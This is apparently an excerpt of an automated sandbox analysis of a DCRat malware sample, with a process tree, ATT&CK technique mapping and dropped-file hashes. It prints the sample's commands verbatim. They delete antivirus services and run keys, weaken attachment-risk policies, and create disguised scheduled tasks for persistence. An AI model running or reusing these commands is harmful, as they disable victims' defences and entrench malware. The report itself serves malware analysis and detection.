Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
6⤵
PID:740

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
6⤵
PID:1792

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
6⤵
PID:396

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
6⤵
PID:2716

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
6⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
6⤵
PID:4836

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
6⤵
PID:428

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
6⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
6⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge" /f /reg:32
6⤵
PID:2168

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
6⤵
PID:2068

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
6⤵
PID:4444

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
6⤵
PID:3040

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
6⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlservice.exe" /f /reg:32
6⤵
PID:3180

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlls.dll" /f /reg:32
6⤵
PID:3300

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
6⤵
PID:2508

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "C:\Windows\system32\rlls.dll" /f /reg:32
6⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
6⤵
PID:1196

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
6⤵
PID:4208

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
6⤵
PID:3620

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
6⤵
PID:3408

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
6⤵
PID:4980

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
6⤵
PID:4236

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
6⤵
PID:2952

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
6⤵
PID:4352

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
6⤵
PID:3160

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
6⤵
PID:3872

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
6⤵
PID:3956

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
6⤵
PID:2992

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
6⤵
PID:5088

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
6⤵
PID:1016

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
6⤵
PID:3636

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
6⤵
- Checks for any installed AV software in registry
PID:4704

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
6⤵
PID:2820

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
6⤵
- Checks for any installed AV software in registry
PID:1632

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
6⤵
PID:3520

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
6⤵
PID:4264

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
6⤵
PID:1216

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
6⤵
PID:2644

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
6⤵
PID:1036

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
6⤵
PID:4592

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
6⤵
PID:1404

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
6⤵
PID:2876

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
6⤵
PID:4388

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
6⤵
PID:2512

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
6⤵
PID:1936

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
6⤵
PID:716

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
6⤵
PID:1456

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
6⤵
- Checks for any installed AV software in registry
PID:3484

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
6⤵
PID:4380

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
6⤵
PID:1748

C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:216

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\savesdll\o23Lz8gEf67oDI4fnROiDtjkjP3rY3.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\savesdll\yJ6RfJ66NGEGI2MLhsk3DOjbzTL4AP.bat" "
6⤵
PID:640

C:\savesdll\H6tchIl3Mk5re1vJkxJB.exe
H6tchIl3Mk5re1vJkxJB.exe -p17d2b7f89e71f3d3b2f00af7ff853ad45cbbac9d
7⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:2552

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\savesdll\pdRmGrBBib01WWxpMtsEP4j1DJCMAO.vbe"
8⤵
- Checks computer location settings
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\savesdll\lDVZCGY84K9R24Wa2h27nnSUIYjiBW.bat" "
9⤵
PID:4000

C:\savesdll\brokersaves.exe
"C:\savesdll\brokersaves.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\conhost.exe'" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:1404

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\spoolsv.exe'" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:4868

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\ProgramData\SoftwareDistribution\dllhost.exe'" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:5032

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "brokersaves" /sc ONLOGON /tr "'C:\PerfLogs\brokersaves.exe'" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:2896

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "sihost" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\setup\sihost.exe'" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:2920

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "brokersaves" /sc ONLOGON /tr "'C:\PerfLogs\brokersaves.exe'" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:1876

C:\PerfLogs\brokersaves.exe
"C:\PerfLogs\brokersaves.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Checks for any installed AV software in registry
PID:2512

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Security Software Discovery

T1063

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PerfLogs\brokersaves.exe
Filesize
450KB

MD5
9a5cd3f75a860a0fd35c9995d4ed2f18

SHA1
0454918baf6aa3b83eacad17dffaf9a1163ab071

SHA256
ee00e902dc356f7df7bf654b5f24522be47f4a6f65615f5fc8c664b3678acd8c

SHA512
d2aa89c86fec1178094143cf16b3c3ddf37fd2e0376f6ff78b2beec10c9f06d15a999282d6f3f7aedae923e0133dd39e6c9d65641a66e0bd0a45f4a4a313691b

Download Submit
C:\PerfLogs\brokersaves.exe
Filesize
450KB

MD5
9a5cd3f75a860a0fd35c9995d4ed2f18

SHA1
0454918baf6aa3b83eacad17dffaf9a1163ab071

SHA256
ee00e902dc356f7df7bf654b5f24522be47f4a6f65615f5fc8c664b3678acd8c

SHA512
d2aa89c86fec1178094143cf16b3c3ddf37fd2e0376f6ff78b2beec10c9f06d15a999282d6f3f7aedae923e0133dd39e6c9d65641a66e0bd0a45f4a4a313691b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\brokersaves.exe.log
Filesize
1KB

MD5
e8d8201859f0733371b04a69e90297ae

SHA1
8222cd86cf6633bdab806efb6cd8f336e2d0187b

SHA256
7f70c61beb86a5573a1c9f37136d60aa88ab65f11bd94e5303c4e2e8d11f8f9f

SHA512
63ba5c2778f02f62a2570d35ec6eb002c94093b94098315ac991b3c70a9d14ba8f3904067cf737df32a3f2e1924b29d7f722613024c2fdb11cf63d46b1bdb627

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Desktop.exe
Filesize
1.0MB

MD5
fba94091b40ab37ea868ebe642403cdd

SHA1
71ddf0570b9c2f998c926881f1cd2618bed438be

SHA256
c893013fd9a312e84edfe5afeff1d53ccbfb1ab17c8680728dca7f673bf97cd8

SHA512
cb408b6381513a250896c328e144ffa5713615ae471921e7cb8cc17efbe598e171184679bb4072133ab06b684329a5e0eaaa40ee50815c3739324a78817d8527

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\ANTIAV~1.DAT
Filesize
1.9MB

MD5
0a90c49f2fe85f3b3518c49a625016b3

SHA1
5516598982e7df5825871fe6975b64dc3b2c9f01

SHA256
4692e219e4084a884eaec49d550e15df7f06a9f219eeff3ae934cbd0a7d94fd8

SHA512
f7b6ddec43e2a3e560f09039f25d19753530b5ec83f4c3294c635112defadd7c78024c45d466d78a1d07f7c2c22c9fcbf898a20cdd4ae46f35853d142eddf063

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\Desktop.exe
Filesize
1.0MB

MD5
fba94091b40ab37ea868ebe642403cdd

SHA1
71ddf0570b9c2f998c926881f1cd2618bed438be

SHA256
c893013fd9a312e84edfe5afeff1d53ccbfb1ab17c8680728dca7f673bf97cd8

SHA512
cb408b6381513a250896c328e144ffa5713615ae471921e7cb8cc17efbe598e171184679bb4072133ab06b684329a5e0eaaa40ee50815c3739324a78817d8527

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_1.zip
Filesize
791KB

MD5
3cba3884d76d34dcb5c099336f0cfd91

SHA1
cda38db73239694b48ce89d0ff23fd7fcf9fbaf5

SHA256
72f37b890f903c039a6b7511ec53924f9eb13b9f335c5a746723e4f032d94c0c

SHA512
b57b0cb10ca7c0ad2f773a01cb375942540036c0c1def0579988a6a0b54d4a9b89f854e3799210a1cd684efd333c064a73bde8cc6d5b2ad6aadd478f360ffb77

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_2.zip
Filesize
791KB

MD5
ee0ebd9d1aebc724bb37114e54a05c1f

SHA1
c7aae2cf5c972d1b74719969e37e313e5f6a01b1

SHA256
8383d5eda3a1cef676b70ef8ace8faf0c433666ee457b38d3523a7bc8c41ee04

SHA512
23981c17244d4a17aadcbba807f2bb9b3c050be4dbaea8ac131c902a1f469cdf4d8fd1e01816de179e69bc71f7b4b1e8caf833080bbfab3259fc75d32b557ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_3.zip
Filesize
791KB

MD5
6784a9cd6ecedd1613df1f0c5b97ee4b

SHA1
